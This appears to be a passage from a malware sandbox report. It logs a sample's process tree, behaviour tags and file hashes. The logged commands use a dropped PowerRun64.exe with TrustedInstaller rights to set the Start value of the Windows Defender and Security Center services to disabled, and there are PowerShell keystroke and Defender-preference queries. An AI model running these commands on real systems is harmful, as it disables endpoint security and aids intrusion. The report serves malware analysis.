C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1008 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2236 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:1600
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2616 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2064 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2436 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:1644
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1912 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2056 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:352 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies security service
PID:2412
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1344 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1576 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2548 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies security service
PID:2868
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2720 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2860 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:2052
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Get-MpPreference"3⤵
- Command and Scripting Interpreter: PowerShell
PID:2824
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')3⤵
- Command and Scripting Interpreter: PowerShell
PID:2628
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')3⤵
- Command and Scripting Interpreter: PowerShell
PID:1420
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\win_version_csharp.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\win_version_csharp.exe"2⤵
- Executes dropped EXE
PID:2740
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240712074711.log C:\Windows\Logs\CBS\CbsPersist_20240712074711.cab1⤵
- Drops file in Windows directory
PID:1416
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
25KB
MD5436c1bb98deeccecb73fad945f1dd3dc
SHA1774313ba911945589971bbc73498d81f060dabe6
SHA25605eae1691149cc66e458d5e5b4430bd3b938b278b8bdb2c887a13c9871004c51
SHA51266ea41b9b4a42f7c40d1ce5b6e82a6f03e8489648b912d96a81efa13d340d4d651078df7c1302c595ca83408e7208d1d79f02165dc27383952a9abe7f851c3e2
-
Filesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
Filesize
12KB
MD51abf8067994181b1a38867bf6437f9d2
SHA1d25e23848f65b85f0f21e9a0a69e4268b625eca2
SHA25623bbb732ff55ab62dc8863a69626ef5655f60bf0d7b96fa2818a895e81283b40
SHA5126237826de2feaf63c2f1312680118474f9b60f5516a05e171743a09a088d7c9bfd06ce9de17852e6f4c2dcb577814163621ff27b2a7bbb37f2a1ae130f64d882
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7XCTKWP9APAY2XBL2IPV.temp
Filesize7KB
MD5702b557c4d1a8411bc40741d0374e558
SHA1d07916873400deca798a8b90e5ed9de684e7c999
SHA256e15e0ae5c0ca6cc2e0ff33d517217e888fb7f1b53b5b42c53c1f054f0b3ecdd1
SHA512dec73a116840fce4a4f5fa9ad042c0187d9f391da54061b74dd3a4cb8d66300c262ec643aa3cbdeec182363b5198b16bb6e304871c990a1e464de9b60b7e800d
-
Filesize
81KB
MD5940b1915cadee0e2b33d80799816f6c7
SHA12c10e4fec3e8c054055d1ed78757117575f273f2
SHA25681e89e7266cfe5158e44f5578c8be61353e781daebdd47a33597e9ec503d379c
SHA512cc3c574fd5392c1b54146b591e22b1c01c95e34a602c403ad96c49b7ee6ad31d1478a00cc1334286addc5cb94496372a172745e9ad20554023e1e22c7da1e1c5
-
Filesize
601KB
MD51fb64ff73938f4a04e97e5e7bf3d618c
SHA1aa0f7db484d0c580533dec0e9964a59588c3632b
SHA2564efc87b7e585fcbe4eaed656d3dbadaec88beca7f92ca7f0089583b428a6b221
SHA512da6007847ffe724bd0b0abe000b0dd5596e2146f4c52c8fe541a2bf5f5f2f5893dccd53ef315206f46a9285ddbd766010b226873038ccac7981192d8c9937ece
-
Filesize
7KB
MD5b4579bc396ace8cafd9e825ff63fe244
SHA132a87ed28a510e3b3c06a451d1f3d0ba9faf8d9c
SHA25601e72332362345c415a7edcb366d6a1b52be9ac6e946fb9da49785c140ba1a4b
SHA5123a76e0e259a0ca12275fed922ce6e01bdfd9e33ba85973e80101b8025ef9243f5e32461a113bbcc6aa75e40894bb5d3a42d6b21045517b6b3cf12d76b4cfa36a